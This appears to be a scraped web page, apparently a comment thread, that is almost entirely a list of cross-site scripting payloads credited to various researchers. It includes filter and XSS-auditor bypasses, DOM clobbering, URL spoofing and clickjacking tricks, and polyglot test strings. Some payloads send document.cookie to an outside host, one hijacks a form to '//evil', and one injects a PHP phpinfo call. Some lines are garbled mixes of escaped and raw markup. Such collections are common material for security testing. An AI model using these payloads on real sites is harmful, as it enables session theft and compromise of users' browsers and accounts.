No referer : <iframe src="javascript:'&lt;script src=&gt;;&lt;/script&gt;'"></iframe>


<svg><script>/**/alert(' @0x6D6172696F ')//*/</script></svg>​


VBScript Event Handling: [Sub XXX_OnError MsgBox " @0x6D6172696F " End Sub]


if(1)alert(' @jackmasa ')}{ works in firebug and webkit's console


<svg><script onlypossibleinopera:-)> alert(1) #opera by @soaj1664ashar</svg>

![if<iframe/onload=vbs::alert[:] #IE by @0x6D6172696F, @jackmasa


<svg>script/XL:href= data:;;;base64;;;;,<>啊YWx啊lc啊nQ啊oMSk啊= mix! #opera by @jackmasa</svg>

<! XSS="><img src=xx:x onerror=alert(1)//"> #Firefox #Opera #Chrome #Safari #XSS

document.body.innerHTML=('<\000\0i\000mg src=xx:x onerror=alert(1)>') #IE #XSS

header('Refresh: 0;url=javascript:alert(1)');


<script language=vbs></script><img src=xx:x onerror="::alert' @insertScript '::">

click


CSS expression <style>*{font-family:'Serif}';x[value=expression(alert(URL=1));]{color:red}</style>


ES #FF for(location of ['javascript:alert(/ff/)']);


E4X function::['location']='javascript'':alert(/FF/)'


HTML5 entity char test


Firefox click <script>eval(test'')</script> by @cgvwzq


CSS and CSS :P

toUpperCase XSS document.write('<ı onclıck=&#97&#108&#101&#114&#116&#40&#49&#41>asd</ı>'.toUpperCase()) by @jackmasa

IE6-8,IE9(quick mode) with jQuery<1.7 $("button").val("<iframe src=vbscript:alert(1)>") by @masa141421356

aha <script src=>alert(/IE|Opera/)</script>

Opera bug? <img src=//\ onload=alert(1)>

Use 127.1 no 127.0.0.1 by @jackmasa

IE vector location='&#118&#98&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41'


jQuery super less-xss,work in IE: $(URL) 6 chars


Bootstrap tooltip.js xss some other plugins (e.g typeahead,popover) are also the same problem //cc @twbootstrap


innerText DOM XSS: innerHTML=innerText

Using IE XSS filter or Chrome xss auditor to block <meta> url redirect.

jQuery 1.8 a new method: $.parseHTML('<img src=xx:X onerror=alert(1)>')

IE all version CSRF vector <img lowsrc=//blog.zsec.uk>

Timing vector <img src=//ixss.sinaapp.com/sleep.php>

Firefox data uri can inherit dom-access. <iframe src="data:D,&lt;script&gt;alert(top.document.body.innerHTML)&lt;/script&gt;"><br>
IE9 &lt;script/onload=alert(1)&gt;&lt;/script&gt;<br>
Webkit and FF &lt;style/onload=alert(1)&gt;<br>
Firefox E4X vector alert(<xss>xs{[function::status]}s</xss>) it is said E4H would replace E4X :P<br>
IE8 document.write('<img src="<iframe/onload=alert(1)>\0">')<br>
If you want to share your cool vector, please do not hesitate to let me know :)<br>
ASP trick: ?input1=&lt;script/&amp;in%u2119ut1=&gt;al%u0117rt('1')&lt;/script&gt; by @IRSDL</p>
<p><iframe srcdoc="<svg/onload=alert(domain)>"> #chrome 20 by @0x6D6172696F<br>
try{*}catch(e if(alert(1))){} by @garethheyes<br>
ß=ss <a href="http://ß.lv">click</a> by @_cweb<br>
<a href="http://www。example。com">click</a> by @_cweb<br>
Firefox link host dom xss <a href="https://t.co/aTtzHaaG">https://t.co/aTtzHaaG</a> by @garethheyes<br>
<a href="http://www﹒example﹒com ">click</a> by @_cweb<br>
history.pushState([],[],'/xssvector') HTML5 URL spoofing!<br>
Clickjacking with history.forward() and history.back() by @lcamtuf<br>
Inertia-Clickjacking for(i=10;i&gt;1;i--)alert(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true); by @80vul<br>
XHTML Entity Hijacking [&lt;!ENTITY nbsp "'"&gt;] by @masa141421356<br>
Firefox &lt;img src=javascript:while([{}]);&gt;<br>
IE <!--[if<img src=x:x onerror=alert(5)//]--> by @0x6D6172696F H5SC#115<br>
Firefox funny vector for(i=0;i&lt;100;) find(); by @garethheyes</p>
<p><script>var location={};</script><br>
IE JSON hijack with UTF-7 json={'x':'',x:location='1'} &lt;script src=... charset=utf-7&gt;&lt;/script&gt;<br>
Firefox &lt;iframe src=view-source://xxxx.com&gt;; with drag and drop</p>
<p>&lt;button form=hijack_form_id formaction=//evil style="position:absolute;left:0;top:0;width:100%;height:100%"&gt;<plaintext> form hijacking &lt;img src='//evil by @lcamtuf<br>
Webkit <iframe> viewsource attribute: // <iframe viewsource src="//test.de"></iframe> by @0x6D6172696F

DOM clobbering:<form name=location > clobbered location object on IE.

DOM clobbering:<form name=document><image name=body> clobbered document->body


<isindex formaction=javascript:alert(1)> by @jackmasa

Classic IE backtick DOM XSS: <script>document.body.innerHTML=''</script>

Firefox click=>google by @garethheyes

click by @kkotowicz

Opera click variant base64 encode. by @jackmasa

Opera <svg><image x:href="data:image/svg-xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"> by LeverOne H5SC#88</svg>

Webkit and Opera click

FF click url trick by @jackmasa

IE <script>-{valueOf:location,toString:[].pop,0:'vbscript:alert%281%29',length:1}</script> @thornmaker , @sirdarckcat

<i/onclick=URL=name> IE less xss,20 chars. by @0x6D6172696F

click

FF no referrer by @sneak_


TheKingOfDuck
2019-03-09 11:13 0 回复

test:

"/><img src=x onerror=alert('test')/>

javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>/alert()/

javascript://--></script></title></style>"/</textarea>/<alert()/' onclick=alert()//>a

javascript://</title>"/</script></style></textarea/-->/<alert()/' onclick=alert()//>/

javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>/alert()/

javascript://'//" --></textarea></style></script></title><b onclick= alert()//>/alert()/

javascript://</title></textarea></style></script --><li '//" '/alert()/', onclick=alert()//

javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>/alert()/

--></script></title></style>"/</textarea><a' onclick=alert()//>/alert()/

/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>/alert()/

javascript://--></title></style></textarea></script><svg "//' onclick=alert()//

/</title/'/</style/</script/--><p" onclick=alert()//>/alert()/

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><script>alert(String.fromCharCode(88,83,83))</script>

“ onclick=alert(1)//<button ‘ onclick=alert(1)//> / alert(1)//

'">><marquee></marquee>"></plaintext></|><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'">

javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>
/alert()/

javascript://--></script></title></style>"/</textarea>
/<alert()/' onclick=alert()//>a

javascript://</title>"/</script></style></textarea/-->
/<alert()/' onclick=alert()//>/

javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>
/alert()/

javascript://'//" --></textarea></style></script></title><b onclick= alert()//>
/alert()/

javascript://</title></textarea></style></script --><li '//" '
/alert()/', onclick=alert()//

javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>
/alert()/

--></script></title></style>"/</textarea><a' onclick=alert()//>
/alert()/

/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>
/alert()/

javascript://--></title></style></textarea></script><svg "//' onclick=alert()//

/</title/'/</style/</script/--><p" onclick=alert()//>
/alert()/*

< script > < / script>

&lt

<

&LT

<

<

<<

<<<

"><script>"</p>
<p><script>alert("XSS")</script>

<<script>alert("XSS");//<</script>


<script>alert(document.cookie)</script>

'><script>alert(document.cookie)</script>

'><script>alert(document.cookie);</script>

";alert('XSS');//

%3cscript%3ealert("XSS");%3c/script%3e

%3cscript%3ealert(document.cookie);%3c%2fscript%3e

%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E

&ltscript&gtalert(document.cookie);</script>

&ltscript&gtalert(document.cookie);&ltscript&gtalert


<xss><script>alert('XSS')</script></vulnerable></xss>


IMG%20SRC='javascript:alert(document.cookie)'



<IMG SRC="javascript:alert('XSS')"


<IMG SRC=javascript:alert('XSS')>


<IMG SRC=JaVaScRiPt:alert('XSS')>


<IMG SRC=javascript:alert("XSS")>


<IMG SRC=javascript:alert("'XSS'")>


<IMG """><script>alert("XSS")</script>">


<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>


<IMG%20SRC='javasc ript:alert(document.cookie)'>









IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'


<IMG SRC=javascript:alert('XSS')>


<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>


<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E

"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'???.cookie</script>

%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<script>alert(String.fromCharCode(88,83,83))</script>=&{}

'';!--"<xss>=&{()}</xss>


<name>','')); phpinfo(); exit;/*</name>

<![CDATA[<script>var n=0;while(true){n;}</script>]]>

<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>

<?xml version="1.0" encoding="ISO-8859-1"?><foo>SCRIPT]]>alert('XSS');/SCRIPT]]></foo>


<xml ID=I><x><c><![CDATA[]]></c></x>


<xml id="xss"><IMG SRC="javascript:alert('XSS')"></xml></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<img language=vbs src=<b onerror=alert#1/1#>

Opera cross-domain set cookie 0day: document.cookie='xss=jackmasa;domain=.me.'

Reverse 401 basic auth phishing by @jackmasa POC:

document.domain='com' chrome/safari same domain suffix cross-domain trick.

Safari empty location bar bug by @jackmasa POC:

Safari location object pollution tech: by @kinugawamasato

Safari URL spoofing about://mmme.me POC:

Opera URL spoofing vuln data://mmme.me by @jackmasa POC:

Universal URL spoofing data:;//mmme.me/view/1#1,2 #firefox #safari #opera

New dom xss vector xxx.innerHTML=document.title by @0x6D6172696F

Opera data:message/rfc822 #XSS by @insertScript


IE <iframe><iframe src=javascript:alert(/@jackmasa/)></iframe>


IE cool expression xss



Clever webkit xss auditor bypass trick <script?=data:,alert(1)<!-- by @cgvwzq

Bypass IE8 version flash docuemnt object protection by @jackmasa

Bypass IE all version flash docuemnt object protection by @gainover1

Bypass IE9 flash docuemnt object protection by @irsdl

Bypass IE8 flash docuemnt object protection by @irsdl

New XSS vector (#Opera Specific) <svg><scRipt %00>prompt(/@soaj1664ashar/)​​​​​​​​​​​​​​​​</svg>

IE xss filter bypass 0day : <xml:namespace prefix=t><import namespace=t implementation=..... by @gainover1 #IE #0day


<iframe srcdoc="&lt;svg/onload=alert(/@80vul/)&gt;"> #chrome</p>
</iframe>

TheKingOfDuck
2019-03-09 10:59 0 回复

This is a test:


<img src=x onerror=confirm(CoolCat)><plaintext/onmouseover=prompt("CoolCat")>